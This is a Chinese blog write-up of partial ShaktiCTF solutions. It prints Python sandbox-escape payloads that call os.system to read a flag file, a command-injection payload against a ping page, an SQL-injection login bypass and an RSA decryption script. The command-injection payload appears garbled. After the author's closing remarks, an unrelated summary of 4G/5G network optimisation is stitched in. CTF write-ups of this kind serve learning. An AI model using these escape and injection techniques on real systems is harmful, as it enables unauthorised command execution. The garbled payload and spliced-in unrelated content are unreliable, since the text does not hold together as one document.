shaktictf题目解析(部分)

shaktictf题目解析(部分)

misc

1.Greeky Fix

首先我们先下载题目附件,是一个py文件,根据题目可以得知是要修复py文件获得flag。

修复前代码如下

在这里插入图片描述

修复后代码如下

在这里插入图片描述

然后根据题目给的提示“Use your “wisdom” to get the flag.”用你的智慧来获取flag,所以我们将secret参数改成’wisdom‘,在运行脚本就可以获取flag

flag: shaktictf{U_r_c0RR3c7!!}

2.Winter Reindeer

首先下载附件,发现是一个txt文本,打开查看可以发现文本都是空的

在这里插入图片描述

我们使用010 Editor打开进行查看,根据hex值可以看出是snow加密(其实文件名也有提示是snow,当时第一次看的的时候还没发现)

在这里插入图片描述

那知道了snow加密,在其次就是找key了,根据题目描述以及提示不难找到key为’Gerolamo Cardano‘(题目的提示是“I invented universal joint and I can hide messages in the form of grids. Who am I?”&“The name of the person is case sensitive. (Eg: Xxx Xxx)”)

用snow工具解密即可获得flag

.\SNOW.EXE -p "Gerolamo Cardano" -C .\snow_chall.txt

在这里插入图片描述

flag: shaktictf{H4v3_4_5n0wy_c7f}

3.level0

根据题目连接上靶机

在这里插入图片描述

查看报错信息,似python报错信息,判断题目类型为python沙盒逃逸

在这里插入图片描述

进行简单绕过

payload: __import__('so'[::-1]).system('cat flag.txt')

在这里插入图片描述

flag: shakti{7h47_w45_7Un!3a36rgjsk9}

4.level1

和上题一样只是过滤的参数不同,用不同的方式进行绕过

payload: getattr(getattr(__builtins__, '__tropmi__'[::-1])('so'[::-1]), 'metsys'[::-1])('cat flag.txt')

在这里插入图片描述

flag: shakti{7h47_W45_4_Cl053_C4ll!!!}

5.endgame

根据题目链接靶机
在这里插入图片描述
和前两道题差不多,只不过过滤更加严格了,无法用之前的方式绕过,这里我选择导入wrapper库,执行命令

payload: [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("cat flag.txt")

在这里插入图片描述

flag: shakti{H0w_D0_y0u_L1k3_35c4p3_r00m5_n0W?}

web

1.Be Alert

访问网站可以发现首页是一张图片

在这里插入图片描述

查看源代码,可以看的有东西在flag.html里

在这里插入图片描述

访问flag.html,他让我们输入密码,那我们就找一下密码在哪,首先查看源代码

在这里插入图片描述

可以看见有一个js的代码块,很简单随便看一下就可以找到结果,密码为shaktiadmin

在这里插入图片描述

<script>
<!--
	let word = "rg`jsh`clhm";
	let password = "";
	function chall(word) {
		for (let i=0; i<word.length;i++) {
			password += String.fromCharCode(word.charCodeAt(i) + 1);
		}
		return password
	}
	document.write(chall(word));
-->
</script>

输入后获得flag

在这里插入图片描述

flag: shaktictf{c0n9r4t5_u53r_hehe65445746}

2.ping-pong

访问网页
在这里插入图片描述
根据提示,修改url访问
在这里插入图片描述

执行ping命令,想到远程代码执行,先尝试使用’ ; ‘或者’ | ‘去执行多命令,发现’ | '可以
在这里插入图片描述
尝试读取flag,cat不能使用,这里可以使用tac

payload: ping?address=google.comltacS{IFS}flag.txt

在这里插入图片描述

flag: shaktictf{cOmm4nd_1nj3ctiOn_iz_3asy right??}

3.L0g1n F4il3d

访问网页,可以发现是应该login登录网页
在这里插入图片描述
用万能密码即可
在这里插入图片描述
在这里插入图片描述

flag: shaktictf{s1mpl3_sqLinjectlon_ehehhehe564321345}

Cryptography

1.Eazy_peaZy

下载附件py文件,代码如下

在这里插入图片描述

可以猜测出题目应该是想让我们去获得最下面那条数据的初始内容

我们将py文件的代码反向修改一下,如下

在这里插入图片描述

将最下面那密文base64解密后的内容作为flag参数,然后运行脚本就可以得到flag

在这里插入图片描述

flag: shaktictf{crypt0_1s_sup3r_eazyyyyyy_gc432tr56g4tr54}

2.secRets_And_seCReTs

打开下载的py文件
在这里插入图片描述
得到n,c,e,ct和secret的值,直接跑即可

from Crypto.Util.number import *

secret=4302040125834928853558463909476079954473400865172251180160558435767130753932883186010390855112227834689861010095690778866857294344059634143100709544931839088413113732983879851609646261868420370506958223094475800449942079286436722629516277911423054845515342792094987249059810059640127872352101234638506603087565277395480953387647118861450659688484283820336767116038031727190397533082113134466893728210621302098082671125283992902107359805546865262918787687109747546968842757321383287635483017116189825332578143804402313162547301864633478350112638450973130720295084401400762328157586821639409421465548080122760881528019152451981418066119560584988658928643613995792058313513615847754001837873387949017975912403754727304537758597079167674369192909953480861392310713676253433998929652777155332408050107725317676660176980502406301244129743702460065671633250603271650634176695472477451658931634382635748322647891956353158570635160043
e=65537
ct=16958627479063955348415964384163116282602743039742753852934410863378528486785270030162782732192537726709536924276654783411884139339994697205619239406660459997082991141519385345070967253589282293949945894128620519748508028990727998488399564805026414462500253524261007024303476629172149332624303860869360966809845919057766279471870925180603362418449119409436609700813481467972962774900963043970140554494187496533636616384537667808308555402187685194879588448942654070984762583024927082993513125305565020701004973206532961944433936049713847420474363949095844995122469523084865481364653146506752587869477287886906616275417
x=175393906935410597646312735251121734825355066308014883020996453700680562811773639892091486800372429659125492317788178170078374593410001133290406346042424977949257610021473876645919378922293673885436422442069899845701280009009220968827934275876545186933778202134359447023530167415550308017091921680916413562203
n=secret//x
p=156613782007770984536049055700840395037085682399926189984796410929143868636172989598027406051641994725886674336805075334390044528511942285958708618671006005927130990180083143883853840126990685118290412751594654157367930730824790742241421921147161987915110899307344903473712967071752529319870067482601269289159

phi = (p - 1) * p

d = pow(e, -1, phi)


print(long_to_bytes(pow(ct,d,n)).decode('utf-8'))


运行后结果如下
在这里插入图片描述

flag: shaktictf{wOw_you_knOw_hOw_RSA_6_CRT_wOrks_!}

Reversing

1.Love Calculator

下载文件,获取文件信息
在这里插入图片描述
这是一个64位的文件,没有加密和混淆,使用ida打开
在这里插入图片描述
flag在v9变量里
在这里插入图片描述
按照顺序拼出flag即可
在这里插入图片描述

Forensics

1.Mission 1

下载文件,根据题目简介,我们需要找到文件的sha1的值,还有windows截图工具的uid和账户密码
在这里插入图片描述
文件sha1值
在这里插入图片描述
导出密码,然后爆破
在这里插入图片描述
在这里插入图片描述
截图工具pid为1076
在这里插入图片描述

flag: shaktictf{ed85ee47484e503787277807d3ef999586aecf1b_londonbridge_1076}

2.Follow Up

下载附件,使用wireshark打开
在这里插入图片描述
查看协议分级
在这里插入图片描述
发现传输了很多data数据,我们选中
在这里插入图片描述每一条都是一个十六进制数,我在查看了前几个时发现了图片点
前4个数据分别是 89 50 4e 47 这是png图片的头数据,我们将data数据都导下来

在这里插入图片描述
使用010Editor新建文件,然后保存为png图片
在这里插入图片描述

flag: shaktictf{that_was_e4sy!}

后记

这是我第一次ctf比赛,会的东西不多只能写出部分解析,在这里也是感谢一名大佬愿意带我打ctf,还一直教我网安的知识,非常感谢。

作者也会继续参加别的比赛,和提升自己,希望可以带来更多的好的文章

以下是对提供的参考资料的总结,按照要求结构化多个要点分条输出: 4G/5G无线网络优化与网规案例分析: NSA站点下终端掉4G问题:部分用户反馈NSA终端频繁掉4G,主要因终端主动发起SCGfail导致。分析显示,在信号较好的环境下,终端可能因节能、过热保护等原因主动释放连接。解决方案建议终端侧进行分析处理,尝试关闭节电开关等。 RSSI算法识别天馈遮挡:通过计算RSSI平均值及差值识别天馈遮挡,差值大于3dB则认定有遮挡。不同设备分组规则不同,如64T和32T。此方法可有效帮助现场人员识别因环境变化引起的网络问题。 5G 160M组网小区CA不生效:某5G站点开启100M+60M CA功能后,测试发现UE无法正常使用CA功能。问题原因在于CA频点集标识配置错误,修正后测试正常。 5G网络优化与策略: CCE映射方式优化:针对诺基亚站点覆盖农村区域,通过优化CCE资源映射方式(交织、非交织),提升RRC连接建立成功率和无线接通率。非交织方式相比交织方式有显著提升。 5G AAU两扇区组网:与三扇区组网相比,AAU两扇区组网在RSRP、SINR、下载速率和上传速率上表现不同,需根据具体场景选择适合的组网方式。 5G语音解决方案:包括沿用4G语音解决方案、EPS Fallback方案和VoNR方案。不同方案适用于不同的5G组网策略,如NSA和SA,并影响语音连续性和网络覆盖。 4G网络优化与资源利用: 4G室分设备利旧:面对4G网络投资压减与资源需求矛盾,提出利旧多维度调优策略,包括资源整合、统筹调配既有资源,以满足新增需求和提质增效。 宏站RRU设备1托N射灯:针对5G深度覆盖需求,研究使用宏站AAU结合1托N射灯方案,快速便捷地开通5G站点,提升深度覆盖能力。 基站与流程管理: 爱立信LTE基站邻区添加流程:未提供具体内容,但通常涉及邻区规划、参数配置、测试验证等步骤,以确保基站间顺畅切换和覆盖连续性。 网络规划与策略: 新高铁跨海大桥覆盖方案试点:虽未提供详细内容,但可推测涉及高铁跨海大桥区域的4G/5G网络覆盖规划,需考虑信号穿透、移动性管理、网络容量等因素。 总结: 提供的参考资料涵盖了4G/5G无线网络优化、网规案例分析、网络优化策略、资源利用、基站管理等多个方面。 通过具体案例分析,展示了无线网络优化中的常见问题及解决方案,如NSA终端掉4G、RSSI识别天馈遮挡、CA不生效等。 强调了5G网络优化与策略的重要性,包括CCE映射方式优化、5G语音解决方案、AAU扇区组网选择等。 提出了4G网络优化与资源利用的策略,如室分设备利旧、宏站RRU设备1托N射灯等。 基站与流程管理方面,提到了爱立信LTE基站邻区添加流程,但未给出具体细节。 新高铁跨海大桥覆盖方案试点展示了特殊场景下的网络规划需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值